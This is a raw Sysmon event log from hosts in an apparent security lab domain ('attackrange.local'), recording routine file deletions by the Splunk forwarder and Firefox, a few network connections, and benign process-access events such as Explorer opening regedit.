23542300x8000000000000000810243Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:09.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E85403D3CE4D0AE80B4779D3A5E20616,SHA256=15D300FBF14514B922E8EBA1589C757F127F340B49C96F29B6339EB876B9765C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:00.060{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local61960-false104.244.42.130-443https 23542300x80000000000000001054409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:09.320{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=7D5134B2E5645761A8C7DED34FDC96F4,SHA256=9B801CCB45EF2D4DF833746F14629E854C5132A4A47BAE2E24EF15947B8050E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D1CB3CDDB57D169CCE2109230D62CE0,SHA256=B2E9F070F34CB2E6DC69941B71386272433C90A91B8658A9A1DB36E0114E661E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:10.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=197AD17C9CE25956DA6845855304967A,SHA256=AF3D2E13CF22606EBB2AB0BAE46FAAA62C99FCBEEC341C65FB1AC408F142151E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:10.173{466BC892-02AF-60E8-0D00-00000000CF01}9009628C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:11.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6C88414B1569BE16A9DEA807ED519E1,SHA256=2D9414E0580397DA30D1CA48F5039E470F7D02ED8EB897DF7C8F8371952150C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:11.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD1FA5F59073EAF9DDB20E0205ECF84D,SHA256=0FC360AA616CBDB8F1BC9412BF6618366391E8350E242A5A78E468330965DAED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:04.600{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61961-false10.0.1.12-8000- 23542300x80000000000000001054430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:12.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E408E1462C4D331FFB876E2014E5770A,SHA256=527EC6CD1CC500E7D7694B45A4E732C72DF35143A3B837095E3908588B2B58DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:11.346{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57455-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:12.104{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D77CF626D38A2D7C4C30FE630DB2BEB8,SHA256=1715373EDE91C5C4D27CA40BADFCD04D7CABFC6293A188D49E12D959E00964FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:13.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC7EFD1E7F8257C40BA99B30CBF21D33,SHA256=FCA429294A50D9EFE893AB182452A06C47A81904FF4209F724DCF98E1F5FCE6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:13.119{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7939B2BEE1BF94DA56433514683EF78,SHA256=545023F9DD864750928DA3BD1A5EE90061C6C116D5DD10083C96DF6F491093D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:13.187{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:13.187{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:14.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DFF1B9B067A7BCC16D46AA2A0D1148E,SHA256=C2EC5A7438096A0C9E858CE9AF15D2604F822C5BC4861FEF4AE3D62945178F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:14.150{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A62C88DE87F7640AB6DE5A7A94A5F7,SHA256=56D9F0E42A9215238BB1EEFDB3F8F2B65315740747695671D7BA218A28DAD824,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA2F719C540CE801A725BB0A65736173,SHA256=4668C5A00B04B41AF6E52CAB0A14B3224E6F021C1AC5A4C0EA54B4031A9C4764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:15.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30D2E6035CAD857621204B0CD834135B,SHA256=DB5BD2817816EDC8F9581206BE7A803798CB35FE8700A228DE97A1F055D3AF6E,IMPHASH=00000000000000000000000000000000falsetrue 